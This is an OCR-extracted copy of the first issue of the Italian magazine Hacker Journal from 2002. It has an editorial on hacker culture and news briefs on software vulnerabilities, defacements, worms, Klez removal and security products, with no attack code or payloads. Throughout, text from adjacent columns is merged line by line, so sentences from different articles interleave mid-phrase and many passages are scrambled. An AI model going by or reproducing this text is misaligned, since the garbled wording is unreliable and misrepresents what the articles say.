Sei sulla pagina 1di 32

> IL CONDOR

La
di
leggenda
Kevin Mitnick.
NEW
Il più “grande”
di tutti i tempi

Telefono, e-mail, fax


> SORRIDI!
> N.1 - Giugno 2002 sei spiato
www.hackerjournal.it

2€

> SCHEDE
PAY-TV
PIRATA > VIRUS
Su Internet tutto Introduzione
il necessario e guida ai “killer
per realizzarle informatici”
a
zz
a
ic

re

s
nk
ws

at

cu

c
ma
ne

li
pr

si

->
->

->

->
->
hack.er (hãk’∂r)
“Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione
e come espandere le loro capacità, a differenza di molti utenti, che preferiscono
imparare solamente il minimo necessario.”

Hacker, Cracker, Defacement... Termini che

hacker
a qualcuno potranno suonare strani, incom-
prensibili, forse, anche divertenti. Chi sono gli
Hacker, cosa fanno ma, soprattutto, parafra-
sando cinema e letteratura, dove vanno? For-
se la definizione più vicina al concetto di Hac-
ker non è quella di “incursore”, di attentatore (istruzioni per l’uso)
alla sicurezza informatica, ma quella di curio-
so, di persona che vuole ampliare la propria
conoscenza informatica, che avidamente è at-
tratta da tutto quello che ruota intorno al set-
tore tecnologico e della sicurezza. Quindi for-
E così ce l’abbiamo fatta
se l’hacker e un buono... E il cattivo? Se fossi- e state leggendo que- quasi completamente ignorato dalla
mo in film di Sergio Leone potrebbe essere il
“Cracker”, colui che entra nei sistemi solo per
provocare dei “disastri”. Forse... Abbiamo de-
finito il Buono, il Cattivo, ci rimane la “voce
narrante”, un ruolo che ci ritagliamo volentie-
ri noi di Hacker Journal con il vostro persona-
lissimo contributo: anzi aiutateci voi a capire
S sto editoriale, vuol dire
che il numero uno di HJ
è in edicola: magari vi
starete chiedendo che
cosa diavolo avete comprato; che cosa
sta dietro ad una idea come quella che
avete tra le mani, se davvero possa rite-
stragrande maggioranza dei suoi fruito-
ri: la sicurezza informatica.
Avevo qualche perplessità riguardo al
titolo di questo periodico: la parola ‘hac-
ker’ non mi piace e non mi è mai piaciu-
ta. E’ ambigua, ad oggi priva di senso. Se
da un lato (quello dell’utenza di massa)
chi sono i buoni e chi sono i cattivi. Magari, un nersi intelligente la trovata di togliersi la identifica erroneamente qualsiasi perso-
giorno, potrebbe venire voglia di schierarci maschera e proporsi alla gente (a tutta na che compia atti illeciti sfruttando le
pure a noi... la gente) in un luogo diverso dalla rete: proprie conoscenze informatiche, dall’al-
bomber78@hackerjournal.it al di fuori dei protocolli di comunicazio- tro (quello degli addetti ai lavori) equi-
ne tra macchine e aldilà di nick e proxy vale a un qualcosa di puramente mistico,
Diteci cosa ne pensate di hj server. e presentarsi ad un newsgroup che trat-
Gli autori sono tutti raggiungibili via e-mail Quando mi venne proposto di collabo- ta di sicurezza dicendo: “Salve a tutti, so-
e ICQ: complimentatevi, criticateci, incazzatevi rare alla realizzazione di un mensile de- no un hacker” equivale più o meno ad
ma soprattutto contattateci!!! dicato al mondo dell’hacking anche io mi entrare al solito bar esordendo con “Sal-
Anno 1 – N. 1 maggio 2002 domandai immediatamente: “A che ve a tutti, sono Dio”… Identica sarà l’ila-
Boss: theguilty@hackerjournal.it pro?” e subito dopo: “Non esiste in Italia rità suscitata.
a cura di Servizi Editoriali: una rivista dedicata all’underground, co- Ma in una maniera o nell’altra occor-
Director: rayuela@hackerjournal.it
Editor: bomber78@hackerjournal.it me mai? Che senso avrebbe?” re presentarsi. Ed eccoci qui: ciò che vor-
Technical editor: caruso_cavallo@hackerjournal.it Ma, a conti fatti, devo dire che un sen- remmo fare è semplicemente trattare
Graphic designer: gfag8@hackerjournal.it
Contributors: cronopio@hackerjournal.it so l’abbiamo trovato, o quantomeno ab- una specifica branca dell’informatica,
(images), Jacopo Bruno (cover skull) biamo cercato di trovarlo: questo nostro un’area della conoscenza che troppo
Publisher povero Paese soffre di una cronica igno- spesso viene descritta alle persone solo e
4ever S.r.l.
Via Torino, 51 ranza scientifica, e anche informatica. unicamente dalle farneticazioni di qual-
20063 Cernusco sul Naviglio Sempre più di sovente, ad ogni livello che giornalista ignorante; o trattata in
Fax +39/02.92.43.22.35
sociale, il computer, ed in particolare le modo ultraspecifico e ultratecnico dai po-
Advertising manager
Davide Colnaghi +39/02.92.43.22.04 reti di computer, giocano un ruolo di chi “esperti” che, lavorando in questo
davidecolnaghi@sprea.it estrema importanza: sia da un punto di settore, non hanno alcun interesse (ed è
Printing vista lavorativo che di puro svago, così comprensibilissimo) a perder tempo nel-
Stige (Torino)
come da un punto di vista didattico, l’in- la divulgazione.
Pubblicazione mensile registrata
al Tribunale di Milano il 25/03/02 formatica si impone come media e si Quello che vorremo riuscire a fare con
con il numero 190. Direttore scontra con l’allarmante arretratezza del HJ è proprio colmare questo buco: offrire
responsabile: Luca Sprea
nostro background culturale. un appoggio a chi si interessa di questi
Gli articoli contenuti in Hacker Journal
hanno uno scopo prettamente didattico Ciò che forse dovrebbe dar da pensa- argomenti, soddisfare la curiosità di chi
e divulgativo. L’editore declina ogni re è la velocità con cui questo fenomeno si avvicina per la prima volta al mondo
responsabilità circa l’uso improprio
delle “tecniche” e dei tutorial si è verificato ed espanso: in pochissimi underground.
che vengono descritti al suo interno.
anni siamo stati (e in parte siamo anco- Nello specifico, non ci interessa dar le-
L’invio di immagini ne autorizza ra) protagonisti di una rivoluzione me- zioni morali a nessuno; manifesti e ‘re-
implicitamente la pubblicazione gratuita
su qualsiasi pubblicazione anche non diatica di ampie proporzioni. Forse non gole per essere un hacker’ le lasciamo a
della 4ever S.r.l. Le immagini inviate alla
redazione non potranno essere restituite. tutti sono abituati alla fulminea rapidità chi ha voglia di dedicarsi a politica e filo-
Copyright 4ever S.r.l. con cui l’informatica si evolve, ed è nor- sofia spicciola, noi vogliamo solo appas-
Testi, fotografie e disegni, male che sia così: ciò ha fatto sì, purtrop- sionare...
pubblicazione anche parziale vietata.
Realizzato con la collaborazione di po, che uno degli aspetti più importanti A sentirci gente!
Hacker News Magazine - Groupe Hagal Aria che internet&co si portano dietro sia ganjiaman@hackerjournal.it - ICQ n° 66876309

2 | www.hackerjournal.it
news
! RAINEWS24: SITO BUCATO O SCARSA
HOT PROFESSIONALITÀ DEI GIORNALISTI?
o aveva segnalato anche “Striscia la noti-
L zia”: sul sito di RaiNews24, chiamando una
pagina interna e non linkata pubblicamente,
ma presente sul web e a disposizione di tutti,
si poteva accedere nientemeno che ad una
! NUOVE FALLE news annunciante la morte del Papa.
IN OFFICE XP La pagina è stata preparata dai giornalisti per
roprio il giorno di Pasqua il celeberrimo poter uscire per primi con la succulenta notizia
P bug hunter Georgi Guninski ha rilasciato nel caso di una improvvisa dipartita del ponte-
un bollettino dove venivano documentate fice, o si è trattato di un’azione di cracking?
due nuove falle di sicurezza che affliggono RaiNews24 ha ammesso che la biografia del
Office XP. La prima vulnerabilità riguarda Papa era già pronta sulle proprie pagine (è una
Outlook XP: sarebbe possibile l’inserimento, cosa abbastanza normale per un giornale) ma
in una email html, di uno script in grado che sarebbe stata resa pubblica da ignoti crac-
di autoeseguirsi ogni volta che si risponde kers.
a un messaggio o lo si inoltra ad altri Sarà, ma qualche dubbio resta… K
indirizzi di posta elettronica.
La seconda falla riguarda invece
una funzione di un componente di Excel: ! BUCA IL SITO VERSIONE KOREANA: MA IL PREMIO
“Questa funzione bacata - spiega Guninski - ARRIVA A 100.000 DOLLARI!
permette la creazione di file con nome
arbitrario e contenuto vario, il tutto è na azienda coreana di sicurezza prevede che l’azienda fornisca le
sufficiente per infilare un file eseguibile U informatica – la Korea Digital specifiche del sistema da attacca-
".hta" nella directory di avvio dell'utente, Works – ha messo in palio una gros- re solo due ore prima dell’inizio del-
cosa che potrebbe portare a prendere sa cifra per chi riuscirà nell’intento la gara.
il pieno controllo del computer di un utente”. di bucare un loro server di nuova Per dimostrare di essere riusciti a
Maggiori info: concezione protetto da una piatta- “entrare” occorrerà modificare un
http://www.guninski.com/m$oxp- forma appositamente sviluppata dal- documento HTML all’interno del
2.html. K l’azienda. server, inserendo un codice ricevu-
L’esperimento ricorda un po’ quello to in fase di registrazione.
tutto nostrano di “buca il sito” che L’ennesima buttata pubblicitaria: a
ha avuto un grande seguito dalle no- quando un concorso del tipo
stre parti. “trombamiamoglie.com” lanciato
Il concorso, della durata di 48 ore, da un sito porno? K

! ENNESIMA FALLA PER MICROSOFT INTERNET


EXPLORER
Tra questi una definita “critica” secondo cui
sarebbe consentito ad un aggressore di “in-
globare all'interno di un cookie uno script in
! NASCE IL PRIMO grado di essere eseguito all'interno dell'area
VIRUS PER SAP R/3 di protezione di IE "Intranet locale".
l sistema operativo preferito dai virus Quest’ultima è assai meno restrittiva rispetto
I coder (Windows) inizia forse ad essere a quella "Internet" tipicamente assegnata agli
“saturo” di codici maliziosi, in primis worm script scaricati dal Web” (Microsoft).
e affini. Così i vari coder hanno sfornato Con questa patch viene anche eliminata la fa-
questo primo esperimento: il SAPvir infetta mosa e diffusa vulnerabilità che consentireb-
le piattaforme industriali SAP R/3 be ad una pagina HTML maliziosa di lanciare
con solo 24 linee di codice e dimostra a Microsoft ha rilasciato l’ennesima patch programmi residenti sulla macchina dell’uten-
come sia possibile, sfruttando l’Advanced L per Internet Explorer, forse il più bacato te che la visualizza.
Business Application Programming (ABAP – browser di navigazione in circolazione, croce La patch e maggiori informazioni si possono
il liguaggio integrato in R/3) un piccolo e delizia di milioni di utenti internet che devo- reperire all’indirizzo internet:
worm che, ad oggi, non riesce ancora no fare quotidianamente i conti con i proble- http://www.microsoft.com/tech-
a diffondersi in rete. mi che lo affliggono. net/treeview/default.asp?url=/tech
I responsabili della SAP hanno dichiarato Si tratta di una cumulative patch che tappa net/security/bulletin/MS02-
che comunque la piattaforma è sicura. K svariati bachi di Explorer. 015.asp. K

www.hackerjournal.it |3
news
! LA FINE DI WINDOWS MESSENGER
HOT iete stufi della presenza invasiva di Win- zarsi in modo definitivo di questa presenza in-
S dows Messenger per Windows XP? L’avete quietante. La soluzione arriva da The Register,
disattivato due milioni di volte eppure continua nota Webzine che ha messo on-line un piccolo
a riproporsi con ostinata determinazione? Bene, file batch di un proprio lettore, direttamente
anzi male, ma non disperate perché sembra sia scaricabile dal sito, che sembra funzionare a
stato individuato un sistema rapido per sbaraz- meraviglia ed eliminare tutti gli effetti collatera-
li delle precedenti soluzioni: come la modifica di
alcune impostazioni del registro attraverso lo
script di sistema "gpedit.msc" lanciabile a riga
di comando (Configurazione Computer -> Mo-
delli Amministrativi -> Componenti di Win-
dows -> Windows Messenger). In linea di
massima l’operazione funziona ma il caricamen-
! SIKUREZZA.ORG to di Outlook Express viene rallentato in modo
uova mailing list per il sito Sikurezza.org. evidente, perché quest’ultimo, all'avvio, cerca
N Si chiama Devel ed è mirata in particolar disperatamente (sic!) Windows Messenger
modo ai settori della sicurezza tentando di eseguirlo. K
e del networking. L’invito è quello
di partecipare inviando tutto quello che possa
in qualche modo essere utile ad approfondire ! GYMNASIUM: UN SERVER/PALESTRA
ed esplorare questi aspetti del segmento PER ALLENARSI CON HACKER JOURNAL
informatico soprattutto: messaggi d'aiuto,
messaggi riguardanti implementazioni acker comportarsi da perfetto Cracker): una bella pale-
di algoritmi di vario genere, tecniche H Journal stra per allenarsi in cui confluiranno, probabilmen-
di programmazione che possono ledere sta pensando te, anche iniziative vere e proprie, e competizioni a
la sicurezza e metodi per la risoluzione di lanciare chi riuscirà per primo a “bucare” il sistema. Cosa
del problema. Inoltre, codice dimostrativo l’operazione ne pensate? Vorremmo davvero conoscere la vo-
riguardante vulnerabilità, codice che illustra Gymnasium. stra opinione per calibrare in modo adeguato que-
tecniche di programmazione sicura In pratica sta che ci sembra un’iniziativa davvero interessan-
o insicura, pubblicità di progetti opensource vorremmo aprire un server dedicato per consentir- te. Scrivete la vostra idea e vostri eventuali sugge-
e qualsiasi altra cosa sia relativa vi di fare tutti i vostri più biechi esperimenti e di di- rimenti, circa questa particolare iniziativa e in rife-
all'argomento programmazione. K ventare “incursori per un giorno”. Sia per mettere rimento anche al giornale nel suo complesso. La
in pratica quanto appreso in linea teorica sulla rivi- mail da usare è gymnasium@hackerjournal.it: la
sta, sia per provare l’ebbrezza di sferrare attacchi palestra potrebbe diventare realtà già dal prossimo
informatici senza fare danno alcuno (insomma numero! K

! PHP HA UNA BELLA FALLA


"fileuploads". Le versioni di PHP vulnerabili sa-
rebbero numerose, fra cui buona parte di quelle
comprese fra la 3.10 e la 4.1.1. Tali bug potreb-
bero consentire ad un utente di inserirsi in re-
moto in un sistema eseguendo un codice arbi-
trario, oppure di mandare a gambe all’aria tutto
il sistema. Peraltro è stato specificato come la
! SYMANTEC: vulnerabilità sia circoscritta alle versioni di PHP
FIREWALL LINUX che girano su Web server Linux o Solaris. Per
mettersi al riparo da ogni rischio è necessario
ymantec annuncia la disponibilità aggiornare PHP alla versione 4.1.2 o scaricare
S di un firewall hardenizzato che gira bug di sicurezza sarebbero contenuti nella le patch.. Se non è possibile effettuare aggior-
su piattaforma Iseries Linux di IBM I funzione "php_mime_split" di PHP e riguarde- namenti, per le versioni di PHP pari o superiori
e che permetterà di proteggere gli iSeries rebbero il modo in cui alcune versioni del lin- alla 4.0.3 si può intervenire manualmente dis-
o altre macchine sulla rete dell'azienda. guaggio gestiscono le richieste di tipo "POST abilitando la funzione "file_uploads" dal file
Il firewall è una versione personalizzata multipart/form-data", anche conosciute come php.ini. K
di Enterprise Firewall di Symantec
per i server che montano Windows e Solaris "IL COMPUTER È CAPACE DI PENSARE PROPRIO QUAN-
e sarà disponibile nella seconda metà TO UN SOTTOMARINO DI NUOTARE".
del 2002. K
Edsgar W. Dijkstra

4 | www.hackerjournal.it
news

! DENIAL OF SERVICE SULLA PIATTAFORMA


WINDOWS 2000 HOT
stata riscontrata una vulnerabilità nel para- tacker di causare un Denial Of Service (DoS) su
E' mentri dopo l'installazione di Windows di una piattaforma Widows 2000 causando co-
2000. si la totale occupazione della CPU facendo cras-
Si verificherebbe di default la possibilità che la hare il Sistema. K
chiave di registro LANMAN permetta ad un at-
Mappa dei sistemi affetti:
La vulnerabilità è riferita ai seguenti sistemi:
- Windows 2000 Server (SP0, SP1, SP2)
- Windows 2000 Advanced Server (SP0, SP1,
SP2)
- Windows 2000 Professional (SP0, SP1, SP2)
! IL TERRIBILE “DUO”
Soluzione: i chiamano Deceptive Duo, sono tra i
La patch è scaricabile all’indirizzo: S cracker più temuti degli Stati Uniti in
http://support.microsoft.com/default.aspx?s questo momento. Sono riusciti a violare con
cid=kb;en-us;Q320751 facilità irrisoria sistemi informatici di rilevanza
strategica. Secondo loro per dimostrare la
vulnerabilità delle strutture informatiche
! UN PREMIO AGLI HACKER? U.S.A., specie dopo i fatti dell’11 settembre
che giustificherebbero una soglia di
hacker questo sconosciuto, una specie in attenzione ben superiore.
L’ via di estinzione, come il capriolo alpino, Il primo e più rilevante sito “craccato” dal
questo almeno secondo l’ANFoV, l'associazione Deceptive Duo è stato quello del U.S. Space
per la convergenza nei servizi di comunicazio- and Naval Ware Systems Command
ne, che ha indetto il concorso "Nella rete con- (http://enterprise.spawar.navy.mil/spawarp
tro la rete? Comprendere il fenomeno hackers", ublicsite/ (il Comando per i sistemi di
con un premio di 2.500 euro per chi contribui- combattimento spaziale e navale), seguito
rà a fare chiarezza sul fenomeno hackers in Eu- poi da siti di compagnie aeree
ropa. Fino al 31 ottobre 2002 c’è tempo per fa- (www.camairsa.co.za,
re pervenire le proprie riflessioni sul mondo de- www.saudiairlines.com,
gli hacker, sia su supporto cartaceo che audio- www.iflyrga.com), banche
visivo. Per chi volesse partecipare tutte le in- (www.unionbank.com), siti di cultura
formazioni del caso trovano spazio sul sito del- religiosa (www.falwell.com) e siti
l’Anfov. K governativi (extra-cas.faa.gov). K

! COMPRESSIONE TRAVAGLIATA
sul sistema Mpeg-4 che consente di “strizzare”
in modo ancora più efficace i file video a audio
permettendone un’agevole diffusione in rete. Il
problema è che il formato Mpeg4, il cui brevet-
to appartiene ad un gruppo di società radunate
sotto il cartello MPEG LA, rischia di monopoliz-
zare di fatto tutto il mercato audio e video di-
ventando lo standard normale di compressione. ! PROBLEMI
Questo preoccupa soprattutto le società con-
correnti, come la On2, che lavorano a standard DI SICUREZZA
alternativi per i file di video compressione. Il tut- SU PLAYER INTERNET
to è finito davanti al Dipartimento di Giustizia ono a rischio Windows Media Player
americano che dovrà decidere se lo sviluppo del S e RealOne Player di RealNetworks, due
sistema MPEG4 è legittimo o se viola le leggi dei sistemi più diffusi per vedere filmati in
formati di compressione Mpeg hanno contri- dell’Antitrust, rischiando così di creare un car- rete. Contengono un baco che consente
I buito a spingere le applicazioni tecnologiche tello di società in grado di dominare il mercato di effettuare attacchi di tipo DoS, sui sistemi
molto avanti, si pensi solo ai formati Mpeg 1 e e stabilire prezzi con completa discrezionalità, vittima. La scoperta è stata fatta per caso
2 che sono i protocolli di compressione utilizza- tagliando fuori tutte quelle società che non vor- da alcuni siti pornografici, che hanno usato
ti per ottenere i file audio MP3 largamente dif- ranno o non potranno convertirsi al nuovo la falla per reindirizzare i browser degli utenti
fusi in rete. Ora l’attenzione sembra spostarsi MPEG4. K proprio sui loro indirizzi. K

www.hackerjournal.it |5
news
! UN CACCIATORE DI TAGLIE
HOT IN CASA MICROSOFT
a Microsoft ha ri- sione “crimini informatici” al Dipartimento
! INSTANT L velato il nome americano.
del nuovo respon- A Charney viene attribuito un ruolo centrale
MESSAGING “SPIATI” sabile dei sistemi di nell'individuazione dei cracker e phreaker di
essuno si deve sentire più al sicuro, sicurezza, si tratta "Legion of Doom" (LOD), una delle più note
N neanche chi comunica attraverso instant di Scott Charney crew nei primi Anni '90, molto attiva e di cui si
messages, ossia i messaggi inviati che prende il posto è parlato tantissimo anche sugli organi di stam-
da programmi come ICQ. Infatti FaceTime di Howard Schmidt, pa specializzati e non.
Communications ha messo a punto che ha lasciato Mi- Certo il lavoro di Charney non sarà tra i più
un programma capace di monitorare tutto crosoft per divenire semplici, vista la quantità di problemi che af-
il traffico degli instant messages, il consigliere per la fiorano quotidianamente sulla sicurezza di ser-
consentendo di configurare alcune parole sicurezza elettroni- ver e lan basati su sistemi Windows, comun-
chiave che allertino chi deve controllare, ca nell'amministra- que la “sfida” si profila interessante. Saprà il
oppure registrando tutto il traffico su un hard zione Bush. Charney deve la sua fama alle im- buon Charney ridare credibilità alla sicurezza
disk, a partire da un dato momento. K prese che lo hanno visto protagonista negli An- dei software Microsoft? Ai posteri l’ardua sen-
ni Novanta, quando era responsabile della divi- tenza. K
! UNA BELLA
“MAPPATURA” ! DON’T CRACK FOR ME ARGENTINA
DEL SITO DELLA CIA
a società di sicurezza informatica Matta opo il crack finanziario che ha sconvolto il Ma nonostante questa intromissione il gruppo
L a scopo dimostrativo è riuscita D paese sudamericano, in Argentina si di cracker l’ha passata liscia, infatti in su-
a disegnare una mappa dettagliata torna a parlare di Crack, ma questa vol- damerica non esiste una legge che
del network della CIA, usando solo tool ta informatico. Un noto team di punisca atti criminosi contro siste-
pubblici e motori di ricerca. In particolare cracker conosciuto come X-Team è mi informatici.
tramite i comandi 'whois' che agiscono stato accusato di essere entrato Né la giurisprudenza serve a col-
sui database dei nomi a dominio e Google, sul web della Corte Suprema del- mare questa lacuna. Dunque
è stato possibile ricostruire la struttura l'Argentina e di aver modificato l’Argentina si pone come paese
dei web server relativi ai sottodomini, alcuni dei contenuti presenti su franco per tutti coloro che voglia-
individuare i router, le loro interfacce, quel sito. In particolare X-Team no “sfondare” in tutta tranquillità
e perfino gli indirizzi IP del network interno. aveva inserito sul sito accuse alla server e reti. Per la cronaca un altro
Questo, tuttavia, non è un sintomo diretto Corte, sostenendo che non si stava oc- “paradiso piratesco” è rappresentato
di vulnerabilità del sito, ma comunque cupando a dovere dell'omicidio di un giorna- dalle Filippine dove non esiste nessuna
un dato che deve fare pensare a prescindere lista, Jose Luis Cabeza. normativa a riguardo. K
dalle misure di protezione da accessi
indesiderati che sono sicuramente state
adottate dalla CIA. K ! ATTENZIONE: IL COMPUTER TI ASCOLTA!
! NUOVA LEGGE nervi ma la spiegazione c’è ed è tutto som-
mato semplice.
ANTI-HACKER Secondo Microsoft, il problema è da ricercarsi
a Commissione nell'opzione di riconoscimento vocale presente
L Europea sta all'interno di Office Xp: questa sarebbe stata
valutando nuove attivata come predefinita da alcuni rivenditori
proposte di legge poco avveduti, all'atto della preinstallazione
per incriminare gli del software su Pc destinati alla vendita.
Internet hackers e i In questo modo, numerosi Pc appena usciti
creatori di virus. Gli dagli scaffali hanno assunto un comportamen-
analisti di settore e to strano e in qualche modo inusuale: l’opzio-
gli esperti di security ne di riconoscimento vocale ha fatto si che ru-
hanno accolto con mori, esclamazioni o, peggio, improperi, venis-
parere favorevole le a notizia è divertente e curiosa. Diversi sero codificati e inseriti nel documento di vi-
proposte, ma molto L utenti che hanno acquistato Pc con Office deoscrittura sotto forma di testo.
deve ancora essere fatto affinché le aziende XP di Microsoft preinstallato, hanno denuncia- La soluzione è facile: basta disattivare l’opzio-
consce della cattiva pubblicità, inizino a to la comparsa nei propri documenti di frasi o ne di riconoscimento vocale o, almeno, evita-
riportare gli attacchi subiti tramite internet parole che loro non avevano mai scritto. re di collocare il Pc vicino alla toilette, per evi-
mettendo così in moto i meccanismi legali Gli utenti in questione probabilmente avranno tare preoccupanti interpretazioni di suoni e ru-
per prevenire il cybercrime. K anche pensato di essere sull’orlo di una crisi di mori. K

6 | www.hackerjournal.it
news

! SYMANTEC GATEWAY SECURITY 5000


livello gateway, intrusion detection, content fil-
HOT
tering e VPN (virtual private networking).
E' possibile effettuare il managment da una GUI
fornita con l'appliance.
Il Firewall è derivato da Symantec Enterprise
ymantec presenta la sua appliance hardwa- Firewall 7.0, l'antivirus da Navex engine men-
S re, tra le più avanzate, per combattere su 5 tre il componente VPN compatibile ipsec è
fronti le minacce dall'esterno e le intrusioni in- Symantec Enterprise VPN 7.0. Sarà possibile
desiderate. avere aggiornamenti automatici dell'appliance
Il Symantec Gateway Security 5000 avrà la tramite Liveupdate e verrà venduta in 3 confi-
possibilità di fare firewall, software anti-virus a gurazioni per 50, 250 e 1000 nodi. K
! ASSICURAZIONE
CONTRO I CRACKER
e polizze assicurative americane
L prevedono la copertura per rischi quali
'attacchi' di virus, assalti di 'denial
of service', defacement del proprio sito
e accessi non autorizzati.
! THE BIG BLUE ALLA RISCOSSA… Nel 2001 sono state vendute polizze
di questo tipo per 100 milioni
sta mettendo a punto un nuovo so, oppure se la riproduzione sarà totalmente di dollari, ma gli analisti del settore
I B Msoftware anti-pirateria che limita, di inibita. Questo a prescindere dal sistema di dif- prevedono che questa cifra si decuplicherà
fatto, la possibilità di scambiare e duplicare fusione: via internet o e-mail. entro il 2007. Una posizione leader in questo
software. In pratica sarà possibile decidere, da Il sistema di protezione agirà a 360 gradi sia settore è quella dell'americana AIG
parte delle società produttrice, se limitare la per quanto concerne i file MP3, quindi l'indu- che detiene il settanta per cento
circolazione, ad esempio, di un file MP3 ad una stria discografica, sia per i DVD, che per i soft- del mercato, e il costo medio delle polizze
sola copia, inibendo le successive e quindi im- ware. K stesse si aggira intorno alle centinaia
pedendo le catene di Sant'Antonio informati- di migliaia di dollari annui. K
che, oppure se limitarne l'ascolto a soli 30 se-
condi o se impedirne del tutto la circolazione.
Il nuovo standard IBM prevede una serie di in-
! BACK OFFICE
teressanti di possibilità, come quella che con- A RISCHIO
sentirà di decidere quante copie del file potran- stata scoperta una vulnerabilità
no essere realizzate da chi ne entra in posses- E 'sul sistema di autenticazione di Back
Office Web Administration, in cui un attacker
potrebbe bypassare la pagina di logon
! KLEZ.E SI RIMUOVE SU ZDNET del Back Office Web Administration.

Per evitare di prendere il worm basta scaricare Sistemi affetti:


la patch di Outlook, tuttavia per chi si fosse, Microsoft's Back Office Web Administrator
ahilui, già infettato, è possibile rimuovere Klez 4.0, 4.5. K
con la seguente procedura:
Entrate nel registro di sistema (Start -> Ese- ! 8.0 LINUX
gui quindi digitate Regedit) ilasciato SuSE 8.0 Linux.
*Cercate e selezionate la chiave HKEY_LO- R Tra le maggiori novità troviamo
CAL_MACHINE>Software>Microsoft> l'inclusione di KDE
Windows 3.0, del kernel
>CurrentVersion>Run 2.4.18,
*Nella finestra di destra cercate le chiavi e del firewall
WINK*.EXE e WQK.EXE e cancellatele. che sta avendo
i è parlato e ultimamente e, c’è da giurarsi, *Se avete fatto la scansione online cancellate molto successo
S se ne riparlerà in futuro, di Klez.e un simpa- anche tutte le chiavi che fanno riferimento ai fi- per la sua
tico worm che si attiva il 6 di ogni mese e so- le che sono risultati infetti. semplice
vrascrive tutti i file con estensioni: .txt", Quindi passate un antivirus, potete approfittare installazione,
".htm", ".html", ".wab", ".doc", ".xls", ".jpg", di quello messo a disposizione on-line da zdnet come è
".cpp", ".c", ".pas", ".mpg", ".mpeg", ".bak" e all’indirizzo: http://www.zdnet.it/antivirus, caratteristico
".mp3". Klez si diffonde a causa di un buco di per verificare la rimozione del worm, e il gioco delle applicazioni
Outlook Express. è fatto! K del “pinguino”. K

www.hackerjournal.it |7
news
! CHIP ASIC PER NETSCREEN
HOT etscreen ha aggiunto un chip ASIC dedi- raggiungere all’indirizzo http://www.net-
N cato alla sua linea di appliances per fire- screen.com/products/NS5000.html. K
! CON LO SPAMMING wall e VPN per migliorarne la velocità di
trhoughput.
FINO A DIECI MILIONI La serie NetScreen-5000, basata su Giga-
DI MULTA Screen-II ASIC, aumenta la velocità del fire-
andare in giro e-mail wall fino a 12 Gigabits per secondo e la velo-
M pubblicitarie e non cità delle virtual private network (VPN) fino a
a go-go, potrebbe dare 6 Gbps.
luogo a spiacevoli La serie NetScreen-5000 comprende anche il
sorprese. NetScreen-5200, che è stato recentemente in-
Infatti il Decreto 185/99 trodotto in Europa ad InfoSecurity, e il Net-
all'articolo 10 sancisce Screen-5400 (che triplica le performances del
l'illegittimità dello spamming senza il previo 5200), e sarà disponibile nel terzo trimestre.
consenso del consumatore, ovvero Tutte le informazioni sui prodotti Netscreen e,
dell'anello finale della catena, colui in particolare, sulla serie 5000 trovano ampio
che riceve il messaggio pubblicitario. spazio sul sito ufficiale della società che si può
In quanto reato lo spamming viene punito
con un'ammenda da 500 a 5.000 euro.
Su questo punto ritorna anche la più recente ! CRITTOGRAFIA OTTICA.
direttiva della Comunità Europea
sul commercio elettronico (8.6.2000 n.31), ia-ming Liu (nella scio laser a dei fotorilevatori che producono un
che prevede corretto l'invio J foto), un docente di segnale elettrico di feedback per dare energia al
di comunicati pubblicitari solo in assenza ingegneria elettrica al- laser stesso.
di un'esplicita opposizione da parte la UCLA di Los Angeles Questo circuito si comporta in modo erratico,
del destinatario. Spetta a quest'ultimo (USA), ha fatto quella un po' come il feedback degli amplificatori acu-
esprimere un rifiuto facendosi inserire che potrebbe diventare stici e Liu ha notato come scegliendo accurata-
negli appositi registri istituti a tale scopo. K una scoperta significa- mente due fasci laser si possano costruire due
tiva nel settore delle circuiti non lineari (caotici) il cui feedback è
comunicazioni “critta- identico.
te” ovvero codificate in Per cui, sincronizzando due laser in città diver-
modo da renderle illeg- se, si può inviare un segnale crittato in questo
gibbili da occhi indi- modo attraverso fibre ottiche senza che alcuna
screti. Liu per arrivare a questa interessante intercettazione possa decodificarlo, come è sta-
conclusione ha provato ad inviare parte di un fa- to sperimentato, ad una velocità di 2.5 Gbps. K

! INSTANT MESSAGING CRIPTATO


ilasciata una soluzione per l'instant mes-
R saging criptato. CIPHERim prodotto da
Cleartext (http://www.cleartext.com.au).
! VULNERABILITÀ AIM Il sistema mette a disposizione una piattafor-
na vulnerabilità di security in AIM ma client server crittografata di instant mes-
U permetterebbe ad un attacker di rubare saging per l'utilizzo all'interno di aziende di ti-
files destinati ad altri, o effettuare un attacco po corporate.
di tipo man in the middle tra due utenti Una scelta sapiente degli algoritmi e della di-
di AIM. Potrebbe essere possibile mensione delle chiavi fa in modo che la piat-
per un attacker ricevere informazioni che taforma non soffra dei tempi di attesa tipici
viaggiano tra due utenti, ed utilizzare queste delle soluzioni di crittografia.
informazioni per impersonare uno dei due Infatti alla prima comunicazione verranno
utenti. Quando AIM riceve una richiesta scambiate le chiavi che resteranno valide per
di connessione o prova a connettersi tutto il periodo della sessione.
a qualcun altro agisce come un server, Si tratta di una soluzione particolarmente in-
un programma che si connette rapidamente teressante proprio in un periodo in cui si par- sto come uno dei più in crescita e la sua ap-
all'IP di destinazione (ogni 450 millisecondi) la di un interesse di diverse major a intercet- plicazione viene ormai estesa a tutte le forme
sulla porta 4443 (Direct Connection) e 5190 tare gli instant messenger per studiare le abi- di comunicazione tecnologica con lo scopo
(File Transfer) sarebbe in grado di prelevare tudini dei consumatori e non solo. evidente di preservarne la privacy costante-
qualsiasi file pronto per il file transfer. K Il settore della crittografia si presenta del re- mente in pericolo. K

8 | www.hackerjournal.it
news

! MICROSOFT BASELINE SECURITY ANALIZER


Annunciato per la prima volta a fine febbraio, il A differenza di quest'ultimo, MBSA si rivolge an-
HOT
Microsoft Baseline Security Analyzer (MBSA) è che agli amministratori di rete, ai quali dedica la
oggi pronto per essere liberamente scaricato dal possibilità di analizzare e gestire i report di più si-
Web. Si tratta di un nuovo tool per la sicurezza il stemi attraverso la specificazione di un nome di
cui compito è quello di scovare vulnerabilità e de- dominio o di un range di indirizzi IP. Il nuovo scan-
bolezze note che possono mettere in pericolo la ner integra inoltre le funzionalità di due altri tool
privacy e la sicurezza degli utenti che utilizzano per la sicurezza: l'HFNetChk, con cui condivide la
Windows NT4/2000/XP. Oltre al sistema operati- tecnologia XML e buona parte del motore di scan-
vo, MBSA è in grado di analizzare Internet Infor- sione, e IISLockdown Tool, dal quale eredita le
mation Server dalla versione 4.0 in poi, SQL Ser- routine per lo scanning di IIS. Al pari di HFNetChk,
